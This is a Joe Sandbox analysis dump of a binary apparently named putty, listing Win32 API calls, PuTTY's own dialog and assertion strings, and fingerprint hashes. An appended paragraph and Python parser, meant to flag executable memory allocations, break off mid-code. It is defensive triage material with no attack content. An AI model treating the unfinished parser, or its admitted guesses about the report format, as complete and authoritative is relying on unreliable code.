                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
                            • API String ID: 2030045667-4035860868
                            • Opcode ID: 9ce7cf1bf2e40765adc9b9d565cd4ff1763c9c8d9ce53b1fd3b2e42b33e98dc4
                            • Instruction ID: d8ff5c68b93e083b80569f9bec6576f0591491d4ad44eb91bff21c47fe9baa32
                            • Instruction Fuzzy Hash: A4F027726443003AD62037B66C8BF5F1A98CB85769F20803FFA00E62D3DB6C488081AE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(Connection closed by remote host,00000040), ref: 0043E645
                            • PostQuitMessage.USER32(00000000), ref: 0043E64F
                            Strings
                            • Connection closed by remote host, xrefs: 0043E63A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$PostQuit
                            • String ID: Connection closed by remote host
                            • API String ID: 1647143952-3682140707
                            • Opcode ID: 283f09523b04d63575c5ba78243ad297d48856cfa937df088a487df4a99abfd3
                            • Instruction ID: 914c25c352eb5f0a08604521f17c2038e9ff5f22030a9409e88ea14c885e3bb9
                            • Opcode Fuzzy Hash: 283f09523b04d63575c5ba78243ad297d48856cfa937df088a487df4a99abfd3
                            • Instruction Fuzzy Hash: 2AF0AF31A09310EEDB301B25BD4A7953AD5E728326F65013BF618D61E1DBB48880CE4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EndDialog.USER32(?,00000001), ref: 0043C5B7
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C5DC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: DialogTextWindow
                            • String ID: %s Licence
                            • API String ID: 2014912272-903691534
                            • Opcode ID: 819ab9c8e8f0e98d19234f12bec839a588f08f7bd7ac5c9f8e60578949687b64
                            • Instruction ID: 0e5d72c0b5e1c0e51ebe976163ac34d89d086ac993b25a38f6b2a31386913515
                            • Opcode Fuzzy Hash: 819ab9c8e8f0e98d19234f12bec839a588f08f7bd7ac5c9f8e60578949687b64
                            • Instruction Fuzzy Hash: 67F0E933104128B7DB211F68AC459AB3F94EB0D314F408037F805E51A2D778E890D79C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,?,00000010), ref: 0043DAB9
                            • PostQuitMessage.USER32(00000001), ref: 0043DADC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$PostQuit
                            • String ID: %.70s Fatal Error
                            • API String ID: 1647143952-1735543297
                            • Opcode ID: d51d0157d1b029ae75f2f36aa7f9422c06822c12592ba0afd521d842187db80e
                            • Instruction ID: 703ac1509dd74b75417c241216f618314377ec3a58b9b4cb029ae826d5fcbeea
                            • Opcode Fuzzy Hash: d51d0157d1b029ae75f2f36aa7f9422c06822c12592ba0afd521d842187db80e
                            • Instruction Fuzzy Hash: 4CF090B1504308BBDB11BB60FD06E9B3AACEF04318F000036FA09A21A2E7B5D954C7DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,?,?,?,00000000), ref: 0043B413
                            Strings
                            • c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 0043B3E7
                            • ..\windows\winctrls.c, xrefs: 0043B3E2
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                            • API String ID: 3015471070-81528470
                            • Opcode ID: 5baa8ba02c5f6628edf0e4e542d14aa980aa1ce1cd930435c61ae2643f60b5fb
                            • Instruction ID: 47f775347b7152b60d097843cc850897167a678657cd6e419965c56102af888d
                            • Opcode Fuzzy Hash: 5baa8ba02c5f6628edf0e4e542d14aa980aa1ce1cd930435c61ae2643f60b5fb
                            • Instruction Fuzzy Hash: 1FF0E272280211EFEB118B18EC02F2677A5FF88711F25043AF554D72A1DB78EC60CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,?,?,?,00000000), ref: 0043B2B1
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B280
                            • c && c->ctrl->generic.type == CTRL_LISTBOX, xrefs: 0043B285
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX
                            • API String ID: 3015471070-1475260855
                            • Opcode ID: 1a62cffa69266a5dd0b537912fdfb0d52f880682f9f894ad944178eda244f7ca
                            • Instruction ID: 51bb2776d3a5c4395bc65458e30a08a41b9787a0b15e88cf56557293a439253e
                            • Opcode Fuzzy Hash: 1a62cffa69266a5dd0b537912fdfb0d52f880682f9f894ad944178eda244f7ca
                            • Instruction Fuzzy Hash: 8EF02772240601EFDB018B18EC06F1A77A5FF88312F154136F254E72A5CB34EC208B9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000134), ref: 0043D3B2
                            Strings
                            • The first %s supported by the serveris %.64s, which is below the configuredwarning threshold.Do you want to continue with this connection?, xrefs: 0043D388
                            • %s Security Alert, xrefs: 0043D39A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Security Alert$The first %s supported by the serveris %.64s, which is below the configuredwarning threshold.Do you want to continue with this connection?
                            • API String ID: 2030045667-1902119048
                            • Opcode ID: c2c2e2e8e939cfe637826370b2c0a04a4efcbdd0b1f54b139a8630a522c67022
                            • Instruction ID: e163b29b78944d46dd901cac14e26cca40f44adbb63c17c5ff4aeed59b3e592f
                            • Opcode Fuzzy Hash: c2c2e2e8e939cfe637826370b2c0a04a4efcbdd0b1f54b139a8630a522c67022
                            • Instruction Fuzzy Hash: 75E09B332453107AD7113AB21C47D5F1E98DB85768F10843FF940552E3EB2988D186EE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(00000000,?,00000187,?,00000000), ref: 0043B3B1
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B38D
                            • c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 0043B392
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                            • API String ID: 3015471070-3851265760
                            • Opcode ID: a3ac7fcd7aa229ad4fca1a69d4592cce2edd6043c35b3615ecf6c52ae8ed85c1
                            • Instruction ID: 3d42031dd30cb322284aeb5fd9aa104d9a9cc666bd3d29a6f113e8fd140c7781
                            • Opcode Fuzzy Hash: a3ac7fcd7aa229ad4fca1a69d4592cce2edd6043c35b3615ecf6c52ae8ed85c1
                            • Instruction Fuzzy Hash: 15F0E235240311EFEB104B04EC01F1A37A1EB89322F21012BF684A71A5CB74AC54CB9B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckRadioButton.USER32(?,?,?,?), ref: 0043AF40
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043AF16
                            • c && c->ctrl->generic.type == CTRL_RADIO, xrefs: 0043AF1B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonCheckRadio
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_RADIO
                            • API String ID: 2493629399-812859048
                            • Opcode ID: f2766435d5fc6fe24638f9b0a0145d5c7e7f62c87a872f703af327dab1224d25
                            • Instruction ID: 703d4bc83cac8d99ba9e863ce10e54e4280b1c53cb4251a4721b52140a9040f7
                            • Opcode Fuzzy Hash: f2766435d5fc6fe24638f9b0a0145d5c7e7f62c87a872f703af327dab1224d25
                            • Instruction Fuzzy Hash: 8EF0E275244102EFC7049B04EC01C2677A6EFC8305B24402EF54993291DB30AC21CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Event
                            • String ID: ..\windows\winhandl.c$h && !h->u.g.moribund
                            • API String ID: 4201588131-1246604691
                            • Opcode ID: f175afbe63e4aa56ccb959c2dbae09f9487a41263a9c2d0c3dafba957fa52a52
                            • Instruction ID: f93ca84c826e04540a16b1b45fffc51779ccf07a8463b935df7041c7bfc36aa7
                            • Opcode Fuzzy Hash: f175afbe63e4aa56ccb959c2dbae09f9487a41263a9c2d0c3dafba957fa52a52
                            • Instruction Fuzzy Hash: B3F0B4B1401B10DFEB715F28A404397B7F0AB04315F050E2FA48281651D3B8A589CBC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetWindowPlacement.USER32(?,?), ref: 0043C332
                            • SetWindowPlacement.USER32(?,0000002C), ref: 0043C34C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: PlacementWindow
                            • String ID: ,
                            • API String ID: 2154376794-3772416878
                            • Opcode ID: 73749fe9244be7c5c53d54efb0aa2dbffdac15ef74cb42b01e61cd708258dcdc
                            • Instruction ID: ae04609f5e6de7fd6d834b59ae7c1789146d701d0b30ae806a7819a193e8c7f5
                            • Opcode Fuzzy Hash: 73749fe9244be7c5c53d54efb0aa2dbffdac15ef74cb42b01e61cd708258dcdc
                            • Instruction Fuzzy Hash: 0FF0F871805218DBDF109FA4ED487E9BBB8EB48355F108026E811B6150D379D998CFA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043B4F4
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B4D5
                            • c && c->ctrl->generic.type == CTRL_FILESELECT, xrefs: 0043B4DA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_FILESELECT
                            • API String ID: 3367045223-1785629237
                            • Opcode ID: c2c67c1d29ab704ebc298600bc56134f2465b7254e3b2321edd330d862784b41
                            • Instruction ID: d1be55e4e3112ea8b0bc44eb08893e2830688ec7092fab1a80ba4f43cdcbd61c
                            • Opcode Fuzzy Hash: c2c67c1d29ab704ebc298600bc56134f2465b7254e3b2321edd330d862784b41
                            • Instruction Fuzzy Hash: 4DE09236240602FFDB115B09FD01E2B77A6EFC9711F15443AF284A7265DB35AC20CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckDlgButton.USER32(?,?,00000000), ref: 0043B007
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043AFE6
                            • c && c->ctrl->generic.type == CTRL_CHECKBOX, xrefs: 0043AFEB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonCheck
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_CHECKBOX
                            • API String ID: 83588225-3937080726
                            • Opcode ID: 11cc214f865bc761df03f06b46b08a1c1400d3e34f281c0f744f233c93f14134
                            • Instruction ID: 0897344bf4113202ed1753a2d3d94a8811d7748486479d6faab9fb0eb67fb1da
                            • Opcode Fuzzy Hash: 11cc214f865bc761df03f06b46b08a1c1400d3e34f281c0f744f233c93f14134
                            • Instruction Fuzzy Hash: 6BE09276285202EFC7016B25BC09C1AB7A5EFC9722B15443AF58492165DB349C70DB97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043B049
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B032
                            • c && c->ctrl->generic.type == CTRL_CHECKBOX, xrefs: 0043B037
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonChecked
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_CHECKBOX
                            • API String ID: 1719414920-3937080726
                            • Opcode ID: 1e30b954dbc9717631839a9baa4ffd5c408a7a6938e1b63f404c54dd07bbaa41
                            • Instruction ID: fc1898bb8bef271a677988a39db5a5d7328478a6f6ad76a6740c692739039d1e
                            • Opcode Fuzzy Hash: 1e30b954dbc9717631839a9baa4ffd5c408a7a6938e1b63f404c54dd07bbaa41
                            • Instruction Fuzzy Hash: 3FE0D836284201EFD7015B58FC01D077B61EF89711B254536F25493155DB35DC208B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0043D471
                            Strings
                            • You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 0043D44A
                            • %s Key File Warning, xrefs: 0043D45C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Key File Warning$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
                            • API String ID: 2030045667-89788609
                            • Opcode ID: 5be199a4de076817227f26902fad7f8a86018aadc71a32ca8c7e12da5f84c780
                            • Instruction ID: f55e4bba365192e1467e1627dfb3c82729b98ff2e9f457c9b6f48c92826da230
                            • Opcode Fuzzy Hash: 5be199a4de076817227f26902fad7f8a86018aadc71a32ca8c7e12da5f84c780
                            • Instruction Fuzzy Hash: AEE04F3214921075E11137227C07FAA1E58CB82769F14803FF500621E3EF29489181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: getservbynamehtons
                            • String ID: nA
                            • API String ID: 3889749166-513057715
                            • Opcode ID: c060702ef779c1e65adec5edaff341a09c049367329732cf1a9ba5b5895d9e2f
                            • Instruction ID: 92f7c6b6b2e0e04b4dbdab212dbd5cce27538f931f65795e0f70666a8095565d
                            • Opcode Fuzzy Hash: c060702ef779c1e65adec5edaff341a09c049367329732cf1a9ba5b5895d9e2f
                            • Instruction Fuzzy Hash: 12C08CF0205210AADB000F31CC0CB3B3BE4BB40783F4448A6B688C50B0DF38C890E628
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HeapReAlloc.KERNEL32(00000000,00000050,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EA4
                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EDD
                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,000000E0,0044E244,00451816,00451816), ref: 00451EFB
                            • HeapFree.KERNEL32(00000000,?,?,000000E0,0044E244,00451816,00451816), ref: 00451F12
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AllocHeap$FreeVirtual
                            • String ID:
                            • API String ID: 3499195154-0
                            • Opcode ID: bc3824ed58629927f8fe2e60f727e6af6cd10a36af7d4f12a2cc63ef0620167c
                            • Instruction ID: a9cc64317911bd8483c249e87d8fe716d60287f07c5decf3417229a61ef6fbb0
                            • Opcode Fuzzy Hash: bc3824ed58629927f8fe2e60f727e6af6cd10a36af7d4f12a2cc63ef0620167c
                            • Instruction Fuzzy Hash: C91160312087019FD7259F28FC86E167BF9F7853227A0463AF566C22B1C330A885CB48
                            Uniqueness

                            Uniqueness Score: -1.00%
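The "APIs" list of the allocation routine above is the kind of trace an analyst ends up grepping through across hundreds of functions, and the raw hex arguments hide the one thing worth checking quickly: what protection each VirtualAlloc asks for. The following parser is an added example written for this page, not part of the Joe Sandbox report or its tooling. It reads API lines in the exact shape printed above (`Func.MODULE(hex,hex,?,...), ref: addr`), maps the leading values onto the documented Win32 parameter names, decodes the VirtualAlloc type and protection bits from winnt.h, and flags any call that requests an executable page. Two interpretations are assumptions, not something the report states: that a `?` marks a value the sandbox could not recover, and that values beyond an API's documented parameter count are extra stack context rather than arguments. The four sample lines are copied from the entry above; the fifth line in the test is constructed to exercise the executable-page check.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the four "APIs" lines of the allocation routine in this
# report section, copied verbatim (bullet included).
SAMPLE_API_LINES = """\
• HeapReAlloc.KERNEL32(00000000,00000050,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EA4
• HeapAlloc.KERNEL32(00000008,000041C4,00000000,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EDD
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,000000E0,0044E244,00451816,00451816), ref: 00451EFB
• HeapFree.KERNEL32(00000000,?,?,000000E0,0044E244,00451816,00451816), ref: 00451F12
"""

# Func.MODULE(hex,hex,?,...), ref: hexaddr
# Assumption: '?' is a value the sandbox could not recover.
API_LINE_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented parameter names (memoryapi.h / heapapi.h). Assumption: the report prints the
# first N stack slots as the N parameters; anything after that is extra stack context.
PARAM_NAMES: Dict[str, List[str]] = {
    "VirtualAlloc": ["lpAddress", "dwSize", "flAllocationType", "flProtect"],
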